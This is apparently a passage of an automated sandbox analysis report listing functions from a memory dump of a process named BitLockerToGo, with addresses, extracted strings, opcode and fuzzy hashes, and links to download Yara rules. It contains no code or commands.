                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: KJUT$KJUT$CBE
                                                                                                                                                                  • API String ID: 0-3327422069
                                                                                                                                                                  • Opcode ID: 23197bd1f5947bcf9780234e383e755a3b411d590b37085cdb7c7bef0f88710f
                                                                                                                                                                  • Instruction ID: 0ed04bd3bcef2967117af9e0384166867f8e90e50043f8ff1d7c4a3df534bb47
                                                                                                                                                                  • Opcode Fuzzy Hash: 23197bd1f5947bcf9780234e383e755a3b411d590b37085cdb7c7bef0f88710f
                                                                                                                                                                  • Instruction Fuzzy Hash: CAA1EFB0900226DBDB14CF94C891B7EFBB2FF49304F544888E545AB390DB759951EBE4
                                                                                                                                                                  Function 02B1FF10 Relevance: 2.9, Strings: 2, Instructions: 420COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 07$AA
                                                                                                                                                                  • API String ID: 0-1380981781
                                                                                                                                                                  • Opcode ID: 863671f383e486dadb6a20da350ac7663064483812f45e0a2cc7f78b4925a4cc
                                                                                                                                                                  • Instruction ID: 40d985e65da6127b73eb066ab330103f5a3ebac01948048a001250148e92b047
                                                                                                                                                                  • Opcode Fuzzy Hash: 863671f383e486dadb6a20da350ac7663064483812f45e0a2cc7f78b4925a4cc
                                                                                                                                                                  • Instruction Fuzzy Hash: 0FD1A8B5C013A9DFDF10DFE4D980AAEBBB1FF16300F144858E8956B241D3399A59CBA1
                                                                                                                                                                  Function 02B03730 Relevance: 2.9, Strings: 2, Instructions: 409COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Inf$NaN
                                                                                                                                                                  • API String ID: 0-3500518849
                                                                                                                                                                  • Opcode ID: fb25dcb1687b7b2d9f1789a413c27e19ccd4788338fe058454676884c708ee69
                                                                                                                                                                  • Instruction ID: 16a93bbcecbb067805efccb871c0fce30dd47667b76aa1f68df33b475671aad9
                                                                                                                                                                  • Opcode Fuzzy Hash: fb25dcb1687b7b2d9f1789a413c27e19ccd4788338fe058454676884c708ee69
                                                                                                                                                                  • Instruction Fuzzy Hash: 72D1E372A083019BC705DF29C8C461ABBE5EBC8754F158EADF895973D0E771EC058B82
                                                                                                                                                                  Function 02B01775 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0123456789ABCDEFXP$0123456789abcdefxp
                                                                                                                                                                  • API String ID: 0-595753566
                                                                                                                                                                  • Opcode ID: 3daf2ba43eb81634c029cf521ac073a03d329ab7b56eca3e97da6260cde9d557
                                                                                                                                                                  • Instruction ID: 68be826ea322a1fd2fdee23c3e844618921dc78ae9484ca98463b06480592777
                                                                                                                                                                  • Opcode Fuzzy Hash: 3daf2ba43eb81634c029cf521ac073a03d329ab7b56eca3e97da6260cde9d557
                                                                                                                                                                  • Instruction Fuzzy Hash: 3F719D316087818BD716CE19C4D436ABFE2EFC5318F188A9DE8E597391D774D909CB82
                                                                                                                                                                  Function 02B01359 Relevance: 2.7, Strings: 2, Instructions: 212COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0123456789ABCDEFXP$0123456789abcdefxp
                                                                                                                                                                  • API String ID: 0-595753566
                                                                                                                                                                  • Opcode ID: d0a57b7ec149e316ecfedd897a01d13926dc38bf5cffd2a56824321998b9f350
                                                                                                                                                                  • Instruction ID: 1368c686cfe5434bc499bb9c0ddf38b197e00e6fed6aa252ffcfc2b12f3a9058
                                                                                                                                                                  • Opcode Fuzzy Hash: d0a57b7ec149e316ecfedd897a01d13926dc38bf5cffd2a56824321998b9f350
                                                                                                                                                                  • Instruction Fuzzy Hash: C5719C316087818BD71ACE19C4D436ABFE2EFC5318F188A9DE8D997391D774D909CB82
                                                                                                                                                                  Function 02B45260 Relevance: 1.9, Strings: 1, Instructions: 694COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: f
                                                                                                                                                                  • API String ID: 0-1993550816
                                                                                                                                                                  • Opcode ID: 720bcd5eb4b66e2956dc9df0d6b3420a49416e24271494356938ea6bfa3a6fe2
                                                                                                                                                                  • Instruction ID: 99c41608e552fece4dae9499e36d45b46a6a4d721688a179757543623d3cff90
                                                                                                                                                                  • Opcode Fuzzy Hash: 720bcd5eb4b66e2956dc9df0d6b3420a49416e24271494356938ea6bfa3a6fe2
                                                                                                                                                                  • Instruction Fuzzy Hash: 5632A2716087419FC724CF18C4D072EBBE6EB98318F988A6DF49587391DB70E845DB92
                                                                                                                                                                  Function 02B052D0 Relevance: 1.8, Strings: 1, Instructions: 565COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: %1.17g
                                                                                                                                                                  • API String ID: 0-1551345525
                                                                                                                                                                  • Opcode ID: fdd719233c8198e2491445607c53848a6a065135b207d06a761981fe8d2ad157
                                                                                                                                                                  • Instruction ID: b1bb821bc88e7ec0f963208aff82d3e253f6c9abecd885c819a79c6df1f874d5
                                                                                                                                                                  • Opcode Fuzzy Hash: fdd719233c8198e2491445607c53848a6a065135b207d06a761981fe8d2ad157
                                                                                                                                                                  • Instruction Fuzzy Hash: DE1205B5A083418BE7368E54C4C432ABF92FFA0218F9C85EDD99A4BBD1E771D804CB41
                                                                                                                                                                  Function 02B273F0 Relevance: 1.7, APIs: 1, Instructions: 242comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(02B4EB80,00000000,00000001,02B4EB70), ref: 02B27419
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 542301482-0
                                                                                                                                                                  • Opcode ID: 07551fa07ffc24521fd3c4bad64e6ff4b62b626e666f80f1368597a247d9a454
                                                                                                                                                                  • Instruction ID: 0d4700f2a67434caeaa961bbceb6cf7a8673d036e63bb3e24506c6ce6108b66d
                                                                                                                                                                  • Opcode Fuzzy Hash: 07551fa07ffc24521fd3c4bad64e6ff4b62b626e666f80f1368597a247d9a454
                                                                                                                                                                  • Instruction Fuzzy Hash: D551E3B06003149BDB209B24CCD6B77B7B8FF85358F084998F9898B291FB75E809D765
                                                                                                                                                                  Function 02B49790 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: P
                                                                                                                                                                  • API String ID: 0-3110715001
                                                                                                                                                                  • Opcode ID: 39a34a41f89b7e1aceee5e4676fc686c86c1f278b7b5cc863857ce2ad5f37dcd
                                                                                                                                                                  • Instruction ID: af92de9583a504062132c36c973448d1e9890bad901b27faead9175d9b2b563d
                                                                                                                                                                  • Opcode Fuzzy Hash: 39a34a41f89b7e1aceee5e4676fc686c86c1f278b7b5cc863857ce2ad5f37dcd
                                                                                                                                                                  • Instruction Fuzzy Hash: 76E1F63290C6718BC725CE1898D062FB7E1EBC5618F0A866CE8B9AB381DB71DC05D7D1
                                                                                                                                                                  Function 02B2AAFA Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: e26c58e03b6887b71928aacb314d08c7695360d3d3d2c1797db3fe9108c9524b
                                                                                                                                                                  • Instruction ID: 16641b0d41e2492b12dec9d4ec977fc7f5d317e3f5c31e60000bb7d6780a82a2
                                                                                                                                                                  • Opcode Fuzzy Hash: e26c58e03b6887b71928aacb314d08c7695360d3d3d2c1797db3fe9108c9524b
                                                                                                                                                                  • Instruction Fuzzy Hash: 64E1BF71D1032ACFDB24CFA8C8906EEB7B2FF49341F654498D849AB360D735A955CB90
                                                                                                                                                                  Function 02B48EF0 Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 2994545307-3962175265
                                                                                                                                                                  • Opcode ID: f47f2e298c4a387f3f75d6da48bb95a47e5c4ebd01b5d6838bfcd728ada1d276
                                                                                                                                                                  • Instruction ID: aae78cbf1b3979f500949133d93931a1cef581dd92b9193b46c611a3bdcae139
                                                                                                                                                                  • Opcode Fuzzy Hash: f47f2e298c4a387f3f75d6da48bb95a47e5c4ebd01b5d6838bfcd728ada1d276
                                                                                                                                                                  • Instruction Fuzzy Hash: A391E171609301ABE720DB14DCC0B6BBBE6EB85354F544CACF98597391EB30E950EB92
                                                                                                                                                                  Function 02B49E80 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Pd"#
                                                                                                                                                                  • API String ID: 0-2688713744
                                                                                                                                                                  • Opcode ID: b08bf0e81301e6003e56139fb764ae925a0d5118c5e290e9505537ab7fb1d7a6
                                                                                                                                                                  • Instruction ID: 445fe0cf1a65a77a4a7bda5af706304cd02b67a53c22b1d416ce44a5553784a2
                                                                                                                                                                  • Opcode Fuzzy Hash: b08bf0e81301e6003e56139fb764ae925a0d5118c5e290e9505537ab7fb1d7a6
                                                                                                                                                                  • Instruction Fuzzy Hash: 2991E135A49311CFC714DF24E09062AB7F1FB89766F8A4C6CE6898B340D735AC60DB52
                                                                                                                                                                  Function 02B0AA20 Relevance: 1.5, Strings: 1, Instructions: 265COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: ,
                                                                                                                                                                  • API String ID: 0-3772416878
                                                                                                                                                                  • Opcode ID: fb02fc462386d6e52bfce02fa31893a96e0c6d2f06de1276703ff6353a1fd837
                                                                                                                                                                  • Instruction ID: 99f76c47703010262c9197fac5fca91a0bfafa94c0f6be39fd9d6eb52255cfda
                                                                                                                                                                  • Opcode Fuzzy Hash: fb02fc462386d6e52bfce02fa31893a96e0c6d2f06de1276703ff6353a1fd837
                                                                                                                                                                  • Instruction Fuzzy Hash: 92B138711083819FD321CF18C98061BFFE1AFA9604F484E6DE5D997782D631E918CBA6
                                                                                                                                                                  Function 02B019C0 Relevance: 1.5, Strings: 1, Instructions: 259COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: null
                                                                                                                                                                  • API String ID: 0-634125391
                                                                                                                                                                  • Opcode ID: f2c810bf989bf4426c87b968b3e7a13c1897350337fd4f3b9acd0231e7a1fb67
                                                                                                                                                                  • Instruction ID: 452c952ccd8a1311ccf5c174705e4311c1c7f78cd57596dd2e93bc8b72a565cb
                                                                                                                                                                  • Opcode Fuzzy Hash: f2c810bf989bf4426c87b968b3e7a13c1897350337fd4f3b9acd0231e7a1fb67
                                                                                                                                                                  • Instruction Fuzzy Hash: B991D3316087528BD72ACE19C8D432ABFE2EFC5308F19899DEC9557391D734E949CB82
                                                                                                                                                                  Function 02B48C60 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: da4d441bbdf916eb3fa8386f033d5fd1c31b4b719d60c1d0e19cd776e02d9716
                                                                                                                                                                  • Instruction ID: 5e10e07c4a4456823005ac0e8566d1ff6223f71c24f0735332c1cf44972c8544
                                                                                                                                                                  • Opcode Fuzzy Hash: da4d441bbdf916eb3fa8386f033d5fd1c31b4b719d60c1d0e19cd776e02d9716
                                                                                                                                                                  • Instruction Fuzzy Hash: 62613E31649351ABC3159A18CCD0B3BFBE2EF95219F188A6CE4E597782D731D840D792
                                                                                                                                                                  Function 02B31BC0 Relevance: 1.5, Strings: 1, Instructions: 236COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "
                                                                                                                                                                  • API String ID: 0-123907689
                                                                                                                                                                  • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                  • Instruction ID: 646e9e9761eed50092f468c348e31d75e391c6fab30cad042be01d81c9004a5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                  • Instruction Fuzzy Hash: D5713A32B183255BD716CE2CC48032EBBEAEBC5750F5989ADE49C8B391D375DC448B82
                                                                                                                                                                  Function 02B017CA Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 0123456789ABCDEFXP
                                                                                                                                                                  • API String ID: 0-2044720025
                                                                                                                                                                  • Opcode ID: edb984f4ab251fa3ffbc7ec8809de910f3d33de34adb687d5867cc557c031270
                                                                                                                                                                  • Instruction ID: 824935599bbdef19ce7c544d22e8f577ee44ebb2dc8e0b4cf5d5d3fa90dd7ca0
                                                                                                                                                                  • Opcode Fuzzy Hash: edb984f4ab251fa3ffbc7ec8809de910f3d33de34adb687d5867cc557c031270
                                                                                                                                                                  • Instruction Fuzzy Hash: BB71AF31A087818BD71ACE19C4D432ABFE2EFC5318F188A9DE8D597391D774D909CB82
                                                                                                                                                                  Function 02B4A060 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Pd"#
                                                                                                                                                                  • API String ID: 0-2688713744
                                                                                                                                                                  • Opcode ID: b5e05e8d50b6363c3a671463ad000c1caf90e43f24ef36ede6ba35d5d62d4309
                                                                                                                                                                  • Instruction ID: 7add466b7b8769b59acd0eb3605586d12c9dc98b54e9d37fcef5117d84b1b9b0
                                                                                                                                                                  • Opcode Fuzzy Hash: b5e05e8d50b6363c3a671463ad000c1caf90e43f24ef36ede6ba35d5d62d4309
                                                                                                                                                                  • Instruction Fuzzy Hash: A351E034648350CFD3149F28E5A0B1EBBF1EF8A756F49886CD2C58B241C735D860DB42
                                                                                                                                                                  Function 02B2EE02 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 4`[b
                                                                                                                                                                  • API String ID: 0-3962175265
                                                                                                                                                                  • Opcode ID: 974b5d2d4029c17e930722ccc6be4a87dccd0b4405e854755663cc32a558f1ee
                                                                                                                                                                  • Instruction ID: ad4c8177fe77da7339e0ffa7b5e013f867e07d52b9e9b72399b0712ed9bdae00
                                                                                                                                                                  • Opcode Fuzzy Hash: 974b5d2d4029c17e930722ccc6be4a87dccd0b4405e854755663cc32a558f1ee
                                                                                                                                                                  • Instruction Fuzzy Hash: 88415875D00229DBEB10DF95D880BAEB7B6FB09344F188494E905BB346D735A929CF60
                                                                                                                                                                  Function 02B4B520 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                  • String ID: @
                                                                                                                                                                  • API String ID: 2994545307-2766056989
                                                                                                                                                                  • Opcode ID: 539cd2c0999806886a2941d9d16a8553b7d17345adbe99026a414b70f08e79c7
                                                                                                                                                                  • Instruction ID: fc3e9efdcf7986bef6cda4a5d7acf849cac5e9b64d678ff46b4438fddbad1f6a
                                                                                                                                                                  • Opcode Fuzzy Hash: 539cd2c0999806886a2941d9d16a8553b7d17345adbe99026a414b70f08e79c7
                                                                                                                                                                  • Instruction Fuzzy Hash: D83189709093008BD714EF14D880A2BFBF9FF8A358F18996CE6C897251E775D914CB56
                                                                                                                                                                  Function 02B2E577 Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: C\ec
                                                                                                                                                                  • API String ID: 0-24268827
                                                                                                                                                                  • Opcode ID: 9b2942c732e16c86e43b83261a49d3f188d86d7c1012303025ad766323deb13c
                                                                                                                                                                  • Instruction ID: eae85851bf851aab4e2f5da003b445ccfe1e88f157b0fec933be6bfbee12a1f2
                                                                                                                                                                  • Opcode Fuzzy Hash: 9b2942c732e16c86e43b83261a49d3f188d86d7c1012303025ad766323deb13c
                                                                                                                                                                  • Instruction Fuzzy Hash: 2D31FFB050C3919BC306EF15D090A1EFBE2BB99748F540E9CE1D6AB251C33AD959CF92
                                                                                                                                                                  Function 02B0C050 Relevance: .8, Instructions: 831COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 4884fb6d91cf2c20c273ad5f717a85c1713415fe145a1074189fc1709d0aba2a
                                                                                                                                                                  • Instruction ID: f7a3f2576c6cf8f25e3477843f6e39c0601489d2607921e88d1b57d14125fdb0
                                                                                                                                                                  • Opcode Fuzzy Hash: 4884fb6d91cf2c20c273ad5f717a85c1713415fe145a1074189fc1709d0aba2a
                                                                                                                                                                  • Instruction Fuzzy Hash: 1842F4315083118BC726DF18D8C02BABBE1FFC4319F298A6ED996972D1E734A455CB46
                                                                                                                                                                  Function 02B13944 Relevance: .7, Instructions: 747COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: aa2b56073c054f28dccf675af2d9440f8a869bc72591346464c7ab20b0f0c0fd
                                                                                                                                                                  • Instruction ID: c551ba0051da72fcaafca5568a3a1577e7eac5c87254d6eafd65ad9a4f50b135
                                                                                                                                                                  • Opcode Fuzzy Hash: aa2b56073c054f28dccf675af2d9440f8a869bc72591346464c7ab20b0f0c0fd
                                                                                                                                                                  • Instruction Fuzzy Hash: B432BAB1500B018FD725DF28D880B27BBF6EF46314F548AACD49A87A91E735F855CB90
                                                                                                                                                                  Function 02B073B0 Relevance: .7, Instructions: 692COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 8f2f842dccc5899cbcf1d43fd7dd6d9f0699ed45608411d532428e34b51d7f22
                                                                                                                                                                  • Instruction ID: e8434ffd04ef402ece631ee061c0c1415b2f1fc513540ed78c75ee4fd5bd6ae8
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f2f842dccc5899cbcf1d43fd7dd6d9f0699ed45608411d532428e34b51d7f22
                                                                                                                                                                  • Instruction Fuzzy Hash: 0752C2715083459BCB16CF18C0D06AAFFE1FF88318F198AADE89957391DB74E845DB81
                                                                                                                                                                  Function 02B0B540 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000004.00000002.2039775191.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02B00000, based on PE: true
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_4_2_2b00000_BitLockerToGo.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e5f84b5916aa0525ba86756ca4ea3b3dc6b1c101fe5d9b0f2560c918251bfdd2
                                                                                                                                                                  • Instruction ID: 9d10eb9ccc97ac7479b9e3cb08d6b6a09d51657e69aad12406a5dcad55c954b8
                                                                                                                                                                  • Opcode Fuzzy Hash: e5f84b5916aa0525ba86756ca4ea3b3dc6b1c101fe5d9b0f2560c918251bfdd2
                                                                                                                                                                  • Instruction Fuzzy Hash: C552B3709087888FE736CB24C4D87A7BFE1EB81318F144DAEC5EA06AC2D379A585C755
                                                                                                                                                                  Function 02B07E10 Relevance: .6, Instructions: 592COMMON
                                                                                                                                                                  Download Yara Rule
